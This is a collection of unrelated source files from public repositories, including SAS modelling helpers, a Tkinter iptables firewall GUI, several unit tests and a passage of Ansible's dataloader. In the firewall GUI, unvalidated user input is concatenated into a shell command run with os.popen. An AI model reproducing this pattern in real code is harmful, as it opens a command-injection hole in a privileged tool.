'VARLIST='; do i = 1 to nvars; vart = vartype(d, i); var = varname(d, i); if vart eq 'C' then put var; end; put 'VARLISTend='; run; """ # ignore teach_me_SAS mode to run contents nosub = self.sas.nosub self.sas.nosub = False ll = self.sas.submit(char_string.format(data.libref, data.table + data._dsopts())) self.sas.nosub = nosub l2 = ll['LOG'].partition("VARLIST=\n") l2 = l2[2].rpartition("VARLISTend=\n") charlist1 = l2[0].split("\n") del charlist1[len(charlist1) - 1] charlist1 = [x.casefold() for x in charlist1] return charlist1 def _processNominals(self, kwargs, data): nom = kwargs.pop('nominals', None) inputs = kwargs.pop('input', None) tgt = kwargs.pop('target', None) targOpts = kwargs.pop('targOpts', None) # get char variables and nominals list if it exists if nom is None: dsnom = SASProcCommons._charlist(self, data) elif isinstance(nom, list): nom = [x.casefold() for x in nom] dsnom = list(set(SASProcCommons._charlist(self, data)) | set(nom)) else: raise SyntaxWarning('nominals must be list type. You gave %s.' % str(type(nom))) if tgt is not None: # what object type is target if isinstance(tgt, str): # if there is special character do nothing if len([word for word in tgt if any(letter in word for letter in '/\:;.%')]) != 0: kwargs['target'] = tgt else: # turn str into list and search for nominals tgt_list = tgt.casefold().split() nom_target = list(set(tgt_list).intersection(dsnom)) int_target = list(set(tgt_list).difference(dsnom)) if (nom_target is not None and len(nom_target) > 0) and ( int_target is not None and len(int_target) > 0): kwargs['target'] = {'nominal' : nom_target, 'interval': int_target} elif nom_target is not None and len(nom_target) > 0: kwargs['target'] = {'nominal': nom_target} elif int_target is not None and len(int_target) > 0: kwargs['target'] = {'interval': int_target} elif isinstance(tgt, list): tgt_list = tgt tgt_list = [x.casefold() for x in tgt_list] nom_target = list(set(tgt_list).intersection(dsnom)) int_target = list(set(tgt_list).difference(dsnom)) if (nom_target is not None and len(nom_target) > 0) and ( int_target is not None and len(int_target) > 0): kwargs['target'] = {'nominal' : nom_target, 'interval': int_target} elif nom_target is not None and len(nom_target) > 0: kwargs['target'] = {'nominal': nom_target} elif int_target is not None and len(int_target) > 0: kwargs['target'] = {'interval': int_target} elif isinstance(tgt, dict): # are the keys valid # TODO: make comparison case insensitive casefold() if any(key in tgt.keys() for key in ['nominal', 'interval']): kwargs['target'] = tgt else: raise SyntaxError("Target must be a string, list, or dictionary you provided: %s" % str(type(tgt))) if targOpts is not None: kwargs['target']['targOpts'] = targOpts if inputs is not None: # what object type is input if isinstance(inputs, str): # if there is only one word or special character do nothing if len(inputs.split()) == 1 or len( [word for word in inputs if any(letter in word for letter in '-/\\:;.%')]) != 0: kwargs['input'] = inputs else: # turn str into list and search for nominals inputs_list = inputs.casefold().split() nom_input = list(set(inputs_list).intersection(dsnom)) int_input = list(set(inputs_list).difference(dsnom)) if (nom_input is not None and len(nom_input) > 0) and ( int_input is not None and len(int_input) > 0): kwargs['input'] = {'nominal' : nom_input, 'interval': int_input} elif nom_input is not None and len(nom_input) > 0: kwargs['input'] = {'nominal': nom_input} elif int_input is not None and len(int_input) > 0: kwargs['input'] = {'interval': int_input} elif isinstance(inputs, list): inputs_list = inputs inputs_list = [x.casefold() for x in inputs_list] nom_input = list(set(inputs_list).intersection(dsnom)) int_input = list(set(inputs_list).difference(dsnom)) if (nom_input is not None and len(nom_input) > 0) and (int_input is not None and len(int_input) > 0): kwargs['input'] = {'nominal' : nom_input, 'interval': int_input} elif nom_input is not None and len(nom_input) > 0: kwargs['input'] = {'nominal': nom_input} elif int_input is not None and len(int_input) > 0: kwargs['input'] = {'interval': int_input} elif isinstance(inputs, dict): # are the keys valid # TODO: make comparison case insensitive casefold() if any(key in inputs.keys() for key in ['nominal', 'interval']): kwargs['input'] = inputs else: raise SyntaxError("input must be a string, list, or dictionary you provided: %s" % str(type(inputs))) return kwargs def _target_stmt(self, stmt: object) -> tuple: """ takes the target key from kwargs and processes it to aid in the generation of a model statement :param stmt: str, list, or dict that contains the model information. :return: tuple of strings one for the class statement one for the model statements """ # make sure target is a single variable extra split to account for level= option code = '' cls = '' if isinstance(stmt, str): if len(stmt.split('/')[0].split()) == 1: code += "%s" % (stmt) else: raise SyntaxError( "ERROR in code submission. TARGET can only have one variable and you submitted: %s" % stmt) elif isinstance(stmt, list): if len(stmt) == 1: code += "%s" % str(stmt[0]) else: raise SyntaxError("The target list must have exactly one member") elif isinstance(stmt, dict): try: # check there there is only one target: length = 0 try: length += len([stmt['nominal'], stmt['interval']]) except KeyError: try: length += len([stmt['nominal']]) except KeyError: try: length += len([stmt['interval']]) except KeyError: raise if length == 1: if 'interval' in stmt.keys(): if isinstance(stmt['interval'], str): code += "%s" % stmt['interval'] if isinstance(stmt['interval'], list): code += "%s" % " ".join(stmt['interval']) if 'nominal' in stmt.keys(): if isinstance(stmt['nominal'], str): code += "%s" % stmt['nominal'] cls += "%s" % stmt['nominal'] if isinstance(stmt['nominal'], list): code += "%s" % " ".join(stmt['nominal']) cls += "%s" % " ".join(stmt['nominal']) else: raise SyntaxError except SyntaxError: print("SyntaxError: TARGET can only have one variable") except KeyError: print("KeyError: Proper keys not found for TARGET dictionary: %s" % stmt.keys()) else: raise SyntaxError("TARGET is in an unknown format: %s" % str(stmt)) return (code, cls) def _input_stmt(self, stmt: object) -> tuple: """ takes the input key from kwargs and processes it to aid in the generation of a model statement :param stmt: str, list, or dict that contains the model information. :return: tuple of strings one for the class statement one for the model statements """ code = '' cls = '' if isinstance(stmt, str): code += "%s " % (stmt) elif isinstance(stmt, dict): try: if 'interval' in stmt.keys(): if isinstance(stmt['interval'], str): code += "%s " % stmt['interval'] if isinstance(stmt['interval'], list): code += "%s " % " ".join(stmt['interval']) if 'nominal' in stmt.keys(): if isinstance(stmt['nominal'], str): code += "%s " % stmt['nominal'] cls += "%s " % stmt['nominal'] if isinstance(stmt['nominal'], list): code += "%s " % " ".join(stmt['nominal']) cls += "%s " % " ".join(stmt['nominal']) except: raise SyntaxError("Proper Keys not found for INPUT dictionary: %s" % stmt.keys()) elif isinstance(stmt, list): if len(stmt) == 1: code += "%s" % str(stmt[0]) elif len(stmt) > 1: code += "%s" % " ".join(stmt) else: raise SyntaxError("The input list has no members") else: raise SyntaxError("INPUT is in an unknown format: %s" % str(stmt)) return (code, cls) def _convert_model_to_target(self): target = kwargs['model'].split('=', maxsplit=1)[0].split()[0] input_list = kwargs['model'].split('=', maxsplit=1)[1].split('/')[0].split() if len(kwargs['model'].split('=', maxsplit=1)[1].split('/')[1]) > 0: warnings.warn("\nThe options after the '/' '{}' will be ignored.".format( kwargs['model'].split('=', maxsplit=1)[1].split('/')[1])) if len(kwargs['cls']) > 0: cls = kwargs['cls'].split() inputs = {'nominal' : cls, 'interval': list(set(input_list).difference(cls))} else: inputs = {'intveral': input_list} kwargs['target'] = target kwargs['input'] = inputs return True def _run_proc(self, procname: str, required_set: set, legal_set: set, **kwargs: dict): """ This internal method takes the options and statements from the PROC and generates the code needed to submit it to SAS. It then submits the code. :param self: :param procname: str :param required_set: set of options :param legal_set: set of valid options :param kwargs: dict (optional) :return: sas result object """ data = kwargs.pop('data', None) if isinstance(data, str): tempdata = data try: table = tempdata.split('.')[-1] lib = tempdata.split('.')[-2] except IndexError: lib = '' # check that the table exists assert self.sas.exist(table, lib), "The dataset does not exist. Check your spelling and/or libname assignment." data = self.sas.sasdata(table, lib) assert isinstance(data, SASdata), "Data must be a sasdata object. Wrong type or string conversion failed." if required_set is None: required_set = {} objtype = procname.lower() if {'model'}.intersection(required_set) and 'target' in kwargs.keys() and 'model' not in kwargs.keys(): kwargs = SASProcCommons._processNominals(self, kwargs, data) t_str, tcls_str = SASProcCommons._target_stmt(self, kwargs['target']) i_str, icls_str = SASProcCommons._input_stmt(self, kwargs['input']) kwargs['model'] = str(t_str + ' = ' + i_str) if len(icls_str) > 0: kwargs['cls'] = str(tcls_str + " " + icls_str) legal_set.add('cls') drop_target = kwargs.pop('target', None) drop_input = kwargs.pop('input', None) self.logger.debug(drop_target) self.logger.debug(drop_input) elif {'target'}.intersection(required_set) and 'model' in kwargs.keys() and 'target' not in kwargs.keys(): SASProcCommons._convert_model_to_target(self) verifiedKwargs = SASProcCommons._stmt_check(self, required_set, legal_set, kwargs) obj1 = [] nosub = False objname = '' log = '' if len(verifiedKwargs): objname = procname[:3].lower() + self.sas._objcnt() # translate to a libname so needs to be less than 8 code = SASProcCommons._makeProcCallMacro(self, objtype, objname, data, verifiedKwargs) self.logger.debug(procname + " macro submission: " + str(code)) if not self.sas.nosub: ll = self.sas.submit(code, "text") log = ll['LOG'] error = SASProcCommons._errorLog(log) isinstance(error, str) if len(error) > 1: RuntimeWarning("ERRORS found in SAS log: \n%s" % error) return SASresults(obj1, self.sas, objname, nosub, log) try: obj1 = SASProcCommons._objectmethods(self, objname) self.logger.debug(obj1) except Exception: pass else: print(code) nosub = True else: RuntimeWarning("Error in code submission") return SASresults(obj1, self.sas, objname, nosub, log) @staticmethod def _stmt_check(self, req: set, legal: set, stmt: dict) -> dict: """ This method checks to make sure that the proc has all required statements and removes any statements aren't valid. Missing required statements is an error. Extra statements are not. :param req: set :param legal: set :param stmt: dict :return: dictionary of verified statements """ # debug the argument list if self.logger.level == 10: for k, v in stmt.items(): print("Key: " + k + ", Value: " + str(v) + ", Type: " + str(type(v))) # required statements reqSet = req if len(reqSet): self.logger.debug("reqSet: {}".format(reqSet)) missing_set = reqSet.difference(set(stmt.keys())) if missing_set: if not stmt.get( 'score'): # till we handle either/or required. proc can be called more than one way w/ diff requirements raise SyntaxError( "You are missing %d required statements:\n%s" % (len(missing_set), str(missing_set))) # legal statements legalSet = legal if len(legalSet): self.logger.debug("legalSet: {}".format(legalSet)) if len(reqSet): totSet = legalSet | reqSet else: totSet = legalSet generalSet = {'ODSGraphics', 'stmtpassthrough', 'targOpts', 'procopts'} extraSet = set(stmt.keys() - generalSet).difference(totSet) # find keys not in legal or required sets if extraSet: self.logger.debug("extraSet: {}".format(extraSet)) for item in extraSet: stmt.pop(item, None) warnings.warn( "The following {} statements are invalid and will be ignored:\n{}".format(len(extraSet), extraSet)) self.logger.debug("stmt: {}".format(stmt)) return stmt
d4rkl0rd3r3b05/Firewall
refs/heads/master
Firewall/apnd.py
1
from Tkinter import * import os class apndwin: def apndwin(self,prntwin): mainwin=Toplevel(master=prntwin) mainwin.resizable(0,0) mainwin.title("Append Rule") #-----------------------------------------This is mainframe-------------------------------------------- mframe=Frame(mainwin) fnt=("FreeSerif",11,"bold") fntopt=("FreeSerif",10) fnttxt=("FreeSerif",12) #------------------------------------------Chain-------------------------------------------------- #chain frame chnfrm=Frame(mframe) #chain label chnlbl=Label(chnfrm,text="Chain"+"\t"*4,font=fnt,relief=FLAT,width=24) chnlbl.pack(side=LEFT,pady=4) #chain options self.chn=StringVar() self.chn.set("INPUT") chnopt = OptionMenu(chnfrm,self.chn,"INPUT","OUTPUT") chnopt["font"]=fntopt chnopt["width"]=18 chnopt.pack() chnfrm.pack(expand=YES,fill=BOTH) #------------------------------------------Action-------------------------------------------------- #Action frame actfrm=Frame(mframe) #Action label actlbl=Label(actfrm,text="Action"+"\t"*4,font=fnt,relief=FLAT,width=24) actlbl.pack(side=LEFT,pady=4) #Action option self.act=StringVar() self.act.set("REJECT") actopt = OptionMenu(actfrm,self.act,"REJECT", "DROP", "LOG","ACCEPT","RETURN") actopt["font"]=fntopt actopt["width"]=18 actopt.pack() actfrm.pack(expand=YES,fill=BOTH) #--------------------------------------Protocol------------------------------------------------------ #Protocol frame protofrm=Frame(mframe) #protocol label protolbl=Label(protofrm,text="Protocol"+"\t"*4,font=fnt,relief=FLAT,width=24) protolbl.pack(side=LEFT,pady=4) #protocol option self.proto=StringVar() self.proto.set("tcp") protoopt = OptionMenu(protofrm,self.proto,"TCP", "UDP","SCTP", "ICMP","UDPLITE","ESP","AH","ALL") protoopt["font"]=fntopt protoopt["width"]=18 protoopt.pack() protofrm.pack(expand=YES,fill=X) #-----------------------------------------source address----------------------------------------------- #source address frame srcaddfrm=Frame(mframe) self.srcadd=StringVar() #source address label srcaddlbl=Label(srcaddfrm,text="Source Address"+"\t"*3,font=fnt,relief=FLAT,width=24) srcaddlbl.pack(side=LEFT,pady=4) #source address text srcaddtxt=Entry(srcaddfrm,textvariable=self.srcadd,font=fnttxt,relief=SUNKEN) srcaddtxt.pack(side=LEFT,pady=4) srcaddfrm.pack(expand=YES,fill=X) #-----------------------------------------source port----------------------------------------------- #source port frame srcprtfrm=Frame(mframe) self.srcprt=StringVar() #source port label srcprtlbl=Label(srcprtfrm,text="Source Port"+"\t"*3,font=fnt,relief=FLAT,width=24) srcprtlbl.pack(side=LEFT,pady=4) #source port text srcprttxt=Entry(srcprtfrm,textvariable=self.srcprt,font=fnttxt,relief=SUNKEN) srcprttxt.pack(side=LEFT,pady=4) srcprtfrm.pack(expand=YES,fill=X) #-----------------------------------------destination address----------------------------------------------- #destination address frame desaddfrm=Frame(mframe) self.desadd=StringVar() #destination address label desaddlbl=Label(desaddfrm,text="Destination Address"+"\t"*2,font=fnt,relief=FLAT,width=24) desaddlbl.pack(side=LEFT,pady=4) #desination address text desaddtxt=Entry(desaddfrm,textvariable=self.desadd,font=fnttxt,relief=SUNKEN) desaddtxt.pack(side=LEFT,pady=4) desaddfrm.pack(expand=YES,fill=X) #-----------------------------------------destination port----------------------------------------------- #destination port frame desprtfrm=Frame(mframe) self.desprt=StringVar() #desination port label desprtlbl=Label(desprtfrm,text="Destination Port"+"\t"*3,font=fnt,relief=FLAT,width=24) desprtlbl.pack(side=LEFT,pady=4) #desination port text desprttxt=Entry(desprtfrm,textvariable=self.desprt,font=fnttxt,relief=SUNKEN) desprttxt.pack(side=LEFT,pady=4) desprtfrm.pack(expand=YES,fill=X) #---------------------------------------------Append button-------------------------------------------------- addbtn=Button(mframe,text="Append Rule",command=self.apnd,\ font=fnt,relief=RAISED,width=18,height=1) addbtn.pack(side=TOP,anchor=CENTER,pady=4) mframe.pack(expand=YES,fill=BOTH) mainwin.mainloop() def apnd(self): chain='iptables -A '+self.chn.get() action=' -j '+self.act.get() #-------------------------------------------------------------------- if(self.chn.get()=="INPUT"): if(self.srcadd.get()!=""): addrs=' -s '+self.srcadd.get() else: addrs=' -s 0/0' else: if(self.desadd.get()!=""): addrs=' -d '+self.desadd.get() else: addrs=' -d 0/0' #--------------------------------------------------------------------- if(self.proto!=""): prtcl=' -p '+self.proto.get() else: prtcl="" #--------------------------------------------------------------------- if(self.srcprt.get()!=""): sprt=' --sport '+self.srcprt.get() else: sprt="" #--------------------------------------------------------------------- if(self.desprt.get()!=""): dprt=' --dport '+self.desprt.get() else: dprt="" try: os.popen(chain+prtcl+addrs+sprt+dprt+action,"r") except: pass apndobj=apndwin() def apndwn(mnwin): apndobj.apndwin(mnwin)
msiedlarek/wiring
refs/heads/master
tests/all/__init__.py
1
import unittest import importlib import six class ModuleTest(unittest.TestCase): module = 'wiring' def test_import_all(self): package = importlib.import_module(self.module) if not hasattr(package, '__all__'): return for name in package.__all__: self.assertTrue( hasattr(package, name), msg=( "Module `{module}` is missing `{name}` which was declared" " in `__all__`." ).format( module=self.module, name=name ) ) class InitTest(unittest.TestCase): imported_modules = ( 'wiring.configuration', 'wiring.dependency', 'wiring.graph', 'wiring.interface', 'wiring.providers', 'wiring.scopes', ) def test_imports(self): import wiring for module in self.imported_modules: package = importlib.import_module(module) if not hasattr(package, '__all__'): continue for name in package.__all__: self.assertTrue( hasattr(wiring, name), msg=( "Module `wiring` is missing `{name}` which should be" " wildcard-imported from `{module}`." ).format( name=name, module=module ) ) def test_metadata(self): import wiring self.assertIsInstance(wiring.__title__, six.string_types) self.assertRegexpMatches(wiring.__title__, r'^\w+$') self.assertIsInstance(wiring.__version__, six.string_types) self.assertRegexpMatches(wiring.__version__, r'^\d+\.\d+\.\d+$')
edx/lettuce
refs/heads/master
tests/integration/django/cucumber/second/features/step_definitions/second.py
19
# -*- coding: utf-8 -*- from lettuce import step @step(u'Given this app is the second app') def given_this_app_is_the_second_app(step): pass
cadyyan/codeeval
refs/heads/master
python/18_multiples_of_a_number.py
2
#!/usr/bin/env python import sys with open(sys.argv[1], 'r') as fh: for line in fh.readlines(): line = line.strip() if line == '': continue (x, n) = [int(v) for v in line.split(',')] v = n while v < x: v += n print v
vlachoudis/sl4a
refs/heads/master
python/src/Lib/encodings/iso2022_jp_3.py
816
# # iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3 # # Written by Hye-Shik Chang <perky@FreeBSD.org> # import _codecs_iso2022, codecs import _multibytecodec as mbc codec = _codecs_iso2022.getcodec('iso2022_jp_3') class Codec(codecs.Codec): encode = codec.encode decode = codec.decode class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, codecs.IncrementalEncoder): codec = codec class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, codecs.IncrementalDecoder): codec = codec class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): codec = codec class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): codec = codec def getregentry(): return codecs.CodecInfo( name='iso2022_jp_3', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter, )
johnnyliu27/openmc
refs/heads/develop
tests/regression_tests/lattice_hex/test.py
11
from tests.testing_harness import TestHarness def test_lattice_hex(): harness = TestHarness('statepoint.10.h5') harness.main()
jfallmann/bioconda-recipes
refs/heads/master
recipes/ega2/ega2.py
22
#!/usr/bin/env python # # Wrapper script for Java Conda packages that ensures that the java runtime # is invoked with the right options. Adapted from the bash script (http://stackoverflow.com/questions/59895/can-a-bash-script-tell-what-directory-its-stored-in/246128#246128). # # Program Parameters # import os import subprocess import sys import shutil from os import access from os import getenv from os import X_OK jar_file = 'EgaDemoClient.jar' default_jvm_mem_opts = ['-Xms512m', '-Xmx1g'] # !!! End of parameter section. No user-serviceable code below this line !!! def real_dirname(path): """Return the symlink-resolved, canonicalized directory-portion of path.""" return os.path.dirname(os.path.realpath(path)) def java_executable(): """Return the executable name of the Java interpreter.""" java_home = getenv('JAVA_HOME') java_bin = os.path.join('bin', 'java') if java_home and access(os.path.join(java_home, java_bin), X_OK): return os.path.join(java_home, java_bin) else: return 'java' def jvm_opts(argv): """Construct list of Java arguments based on our argument list. The argument list passed in argv must not include the script name. The return value is a 3-tuple lists of strings of the form: (memory_options, prop_options, passthrough_options) """ mem_opts = [] prop_opts = [] pass_args = [] exec_dir = None for arg in argv: if arg.startswith('-D'): prop_opts.append(arg) elif arg.startswith('-XX'): prop_opts.append(arg) elif arg.startswith('-Xm'): mem_opts.append(arg) elif arg.startswith('--exec_dir='): exec_dir = arg.split('=')[1].strip('"').strip("'") if not os.path.exists(exec_dir): shutil.copytree(real_dirname(sys.argv[0]), exec_dir, symlinks=False, ignore=None) else: pass_args.append(arg) # In the original shell script the test coded below read: # if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ] # To reproduce the behaviour of the above shell code fragment # it is important to explictly check for equality with None # in the second condition, so a null envar value counts as True! if mem_opts == [] and getenv('_JAVA_OPTIONS') is None: mem_opts = default_jvm_mem_opts return (mem_opts, prop_opts, pass_args, exec_dir) def main(): java = java_executable() """ PeptideShaker updates files relative to the path of the jar file. In a multiuser setting, the option --exec_dir="exec_dir" can be used as the location for the peptide-shaker distribution. If the exec_dir dies not exist, we copy the jar file, lib, and resources to the exec_dir directory. """ (mem_opts, prop_opts, pass_args, exec_dir) = jvm_opts(sys.argv[1:]) jar_dir = exec_dir if exec_dir else real_dirname(sys.argv[0]) if pass_args != [] and pass_args[0].startswith('eu'): jar_arg = '-cp' else: jar_arg = '-jar' jar_path = os.path.join(jar_dir, jar_file) java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args sys.exit(subprocess.call(java_args)) if __name__ == '__main__': main()
trivoldus28/pulsarch-verilog
refs/heads/master
tools/local/bas-release/bas,3.9/lib/python/lib/python2.3/idlelib/IdleHistory.py
11
class History: def __init__(self, text, output_sep = "\n"): self.text = text self.history = [] self.history_prefix = None self.history_pointer = None self.output_sep = output_sep text.bind("<<history-previous>>", self.history_prev) text.bind("<<history-next>>", self.history_next) def history_next(self, event): self.history_do(0) return "break" def history_prev(self, event): self.history_do(1) return "break" def _get_source(self, start, end): # Get source code from start index to end index. Lines in the # text control may be separated by sys.ps2 . lines = self.text.get(start, end).split(self.output_sep) return "\n".join(lines) def _put_source(self, where, source): output = self.output_sep.join(source.split("\n")) self.text.insert(where, output) def history_do(self, reverse): nhist = len(self.history) pointer = self.history_pointer prefix = self.history_prefix if pointer is not None and prefix is not None: if self.text.compare("insert", "!=", "end-1c") or \ self._get_source("iomark", "end-1c") != self.history[pointer]: pointer = prefix = None if pointer is None or prefix is None: prefix = self._get_source("iomark", "end-1c") if reverse: pointer = nhist else: pointer = -1 nprefix = len(prefix) while 1: if reverse: pointer = pointer - 1 else: pointer = pointer + 1 if pointer < 0 or pointer >= nhist: self.text.bell() if self._get_source("iomark", "end-1c") != prefix: self.text.delete("iomark", "end-1c") self._put_source("iomark", prefix) pointer = prefix = None break item = self.history[pointer] if item[:nprefix] == prefix and len(item) > nprefix: self.text.delete("iomark", "end-1c") self._put_source("iomark", item) break self.text.mark_set("insert", "end-1c") self.text.see("insert") self.text.tag_remove("sel", "1.0", "end") self.history_pointer = pointer self.history_prefix = prefix def history_store(self, source): source = source.strip() if len(source) > 2: # avoid duplicates try: self.history.remove(source) except ValueError: pass self.history.append(source) self.history_pointer = None self.history_prefix = None def recall(self, s): s = s.strip() self.text.tag_remove("sel", "1.0", "end") self.text.delete("iomark", "end-1c") self.text.mark_set("insert", "end-1c") self.text.insert("insert", s) self.text.see("insert")
SaschaMester/delicium
refs/heads/master
tools/gyp-explain.py
153
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Prints paths between gyp targets. """ import json import os import sys import time from collections import deque def usage(): print """\ Usage: tools/gyp-explain.py [--dot] chrome_dll# gtest# """ def GetPath(graph, fro, to): """Given a graph in (node -> list of successor nodes) dictionary format, yields all paths from |fro| to |to|, starting with the shortest.""" # Storing full paths in the queue is a bit wasteful, but good enough for this. q = deque([(fro, [])]) while q: t, path = q.popleft() if t == to: yield path + [t] for d in graph[t]: q.append((d, path + [t])) def MatchNode(graph, substring): """Given a dictionary, returns the key that matches |substring| best. Exits if there's not one single best match.""" candidates = [] for target in graph: if substring in target: candidates.append(target) if not candidates: print 'No targets match "%s"' % substring sys.exit(1) if len(candidates) > 1: print 'More than one target matches "%s": %s' % ( substring, ' '.join(candidates)) sys.exit(1) return candidates[0] def EscapeForDot(string): suffix = '#target' if string.endswith(suffix): string = string[:-len(suffix)] string = string.replace('\\', '\\\\') return '"' + string + '"' def GenerateDot(fro, to, paths): """Generates an input file for graphviz's dot program.""" prefixes = [os.path.commonprefix(path) for path in paths] prefix = os.path.commonprefix(prefixes) print '// Build with "dot -Tpng -ooutput.png this_file.dot"' # "strict" collapses common paths. print 'strict digraph {' for path in paths: print (' -> '.join(EscapeForDot(item[len(prefix):]) for item in path)), ';' print '}' def Main(argv): # Check that dump.json exists and that it's not too old. dump_json_dirty = False try: st = os.stat('dump.json') file_age_s = time.time() - st.st_mtime if file_age_s > 2 * 60 * 60: print 'dump.json is more than 2 hours old.' dump_json_dirty = True except OSError: print 'dump.json not found.' dump_json_dirty = True if dump_json_dirty: print 'Run' print ' GYP_GENERATORS=dump_dependency_json build/gyp_chromium' print 'first, then try again.' sys.exit(1) g = json.load(open('dump.json')) if len(argv) not in (3, 4): usage() sys.exit(1) generate_dot = argv[1] == '--dot' if generate_dot: argv.pop(1) fro = MatchNode(g, argv[1]) to = MatchNode(g, argv[2]) paths = list(GetPath(g, fro, to)) if len(paths) > 0: if generate_dot: GenerateDot(fro, to, paths) else: print 'These paths lead from %s to %s:' % (fro, to) for path in paths: print ' -> '.join(path) else: print 'No paths found from %s to %s.' % (fro, to) if __name__ == '__main__': Main(sys.argv)
lavish205/olympia
refs/heads/master
src/olympia/abuse/tests/test_serializers.py
5
from olympia.abuse.models import AbuseReport from olympia.abuse.serializers import ( AddonAbuseReportSerializer, UserAbuseReportSerializer) from olympia.accounts.serializers import BaseUserSerializer from olympia.amo.tests import BaseTestCase, addon_factory, user_factory class TestAddonAbuseReportSerializer(BaseTestCase): def serialize(self, report, **extra_context): return AddonAbuseReportSerializer(report, context=extra_context).data def test_addon_report(self): addon = addon_factory(guid='@guid') report = AbuseReport(addon=addon, message='bad stuff') serial = self.serialize(report) assert serial == {'reporter': None, 'addon': {'guid': addon.guid, 'id': addon.id, 'slug': addon.slug}, 'message': 'bad stuff'} def test_guid_report(self): report = AbuseReport(guid='@guid', message='bad stuff') serial = self.serialize(report) assert serial == {'reporter': None, 'addon': {'guid': '@guid', 'id': None, 'slug': None}, 'message': 'bad stuff'} class TestUserAbuseReportSerializer(BaseTestCase): def serialize(self, report, **extra_context): return UserAbuseReportSerializer(report, context=extra_context).data def test_user_report(self): user = user_factory() report = AbuseReport(user=user, message='bad stuff') serial = self.serialize(report) user_serial = BaseUserSerializer(user).data assert serial == {'reporter': None, 'user': user_serial, 'message': 'bad stuff'}
yaqiyang/autorest
refs/heads/master
src/generator/AutoRest.Python.Tests/Expected/AcceptanceTests/Header/autorestswaggerbatheaderservice/__init__.py
25
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from .auto_rest_swagger_bat_header_service import AutoRestSwaggerBATHeaderService from .version import VERSION __all__ = ['AutoRestSwaggerBATHeaderService'] __version__ = VERSION
kvar/ansible
refs/heads/seas_master_2.9.5
lib/ansible/parsing/dataloader.py
25
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import copy import os import os.path import re import tempfile from ansible import constants as C from ansible.errors import AnsibleFileNotFound, AnsibleParserError from ansible.module_utils.basic import is_executable from ansible.module_utils.six import binary_type, text_type from ansible.module_utils._text import to_bytes, to_native, to_text from ansible.parsing.quoting import unquote from ansible.parsing.utils.yaml import from_yaml from ansible.parsing.vault import VaultLib, b_HEADER, is_encrypted, is_encrypted_file, parse_vaulttext_envelope from ansible.utils.path import unfrackpath from ansible.utils.display import Display display = Display() # Tries to determine if a path is inside a role, last dir must be 'tasks' # this is not perfect but people should really avoid 'tasks' dirs outside roles when using Ansible. RE_TASKS = re.compile(u'(?:^|%s)+tasks%s?$' % (os.path.sep, os.path.sep)) class DataLoader: ''' The DataLoader class is used to load and parse YAML or JSON content, either from a given file name or from a string that was previously read in through other means. A Vault password can be specified, and any vault-encrypted files will be decrypted. Data read from files will also be cached, so the file will never be read from disk more than once. Usage: dl = DataLoader() # optionally: dl.set_vault_password('foo') ds = dl.load('...') ds = dl.load_from_file('/path/to/file') ''' def __init__(self): self._basedir = '.' self._FILE_CACHE = dict() self._tempfiles = set() # initialize the vault stuff with an empty password # TODO: replace with a ref to something that can get the password # a creds/auth provider # self.set_vault_password(None) self._vaults = {} self._vault = VaultLib() self.set_vault_secrets(None) # TODO: since we can query vault_secrets late, we could provide this to DataLoader init def set_vault_secrets(self, vault_secrets): self._vault.secrets = vault_secrets def load(self, data, file_name='<string>', show_content=True): '''Backwards compat for now''' return from_yaml(data, file_name, show_content, self._vault.secrets) def load_from_file(self, file_name, cache=True, unsafe=False): ''' Loads data from a file, which can contain either JSON or YAML. ''' file_name = self.path_dwim(file_name) display.debug("Loading data from %s" % file_name) # if the file has already been read in and cached, we'll # return those results to avoid more file/vault operations if cache and file_name in self._FILE_CACHE: parsed_data = self._FILE_CACHE[file_name] else: # read the file contents and load the data structure from them (b_file_data, show_content) = self._get_file_contents(file_name) file_data = to_text(b_file_data, errors='surrogate_or_strict') parsed_data = self.load(data=file_data, file_name=file_name, show_content=show_content) # cache the file contents for next time self._FILE_CACHE[file_name] = parsed_data if unsafe: return parsed_data else: # return a deep copy here, so the cache is not affected return copy.deepcopy(parsed_data) def path_exists(self, path): path = self.path_dwim(path) return os.path.exists(to_bytes(path, errors='surrogate_or_strict')) def is_file(self, path): path = self.path_dwim(path) return os.path.isfile(to_bytes(path, errors='surrogate_or_strict')) or path == os.devnull def is_directory(self, path): path = self.path_dwim(path) return os.path.isdir(to_bytes(path, errors='surrogate_or_strict')) def list_directory(self, path): path = self.path_dwim(path) return os.listdir(path) def is_executable(self, path): '''is the given path executable?''' path = self.path_dwim(path) return is_executable(path) def _decrypt_if_vault_data(self, b_vault_data, b_file_name=None): '''Decrypt b_vault_data if encrypted and return b_data and the show_content flag''' if not is_encrypted(b_vault_data): show_content = True return b_vault_data, show_content b_ciphertext, b_version, cipher_name, vault_id = parse_vaulttext_envelope(b_vault_data) b_data = self._vault.decrypt(b_vault_data, filename=b_file_name) show_content = False return b_data, show_content def _get_file_contents(self, file_name): ''' Reads the file contents from the given file name If the contents are vault-encrypted, it will decrypt them and return the decrypted data :arg file_name: The name of the file to read. If this is a relative path, it will be expanded relative to the basedir :raises AnsibleFileNotFound: if the file_name does not refer to a file :raises AnsibleParserError: if we were unable to read the file :return: Returns a byte string of the file contents ''' if not file_name or not isinstance(file_name, (binary_type, text_type)): raise AnsibleParserError("Invalid filename: '%s'" % to_native(file_name)) b_file_name = to_bytes(self.path_dwim(file_name)) # This is what we really want but have to fix unittests to make it pass # if not 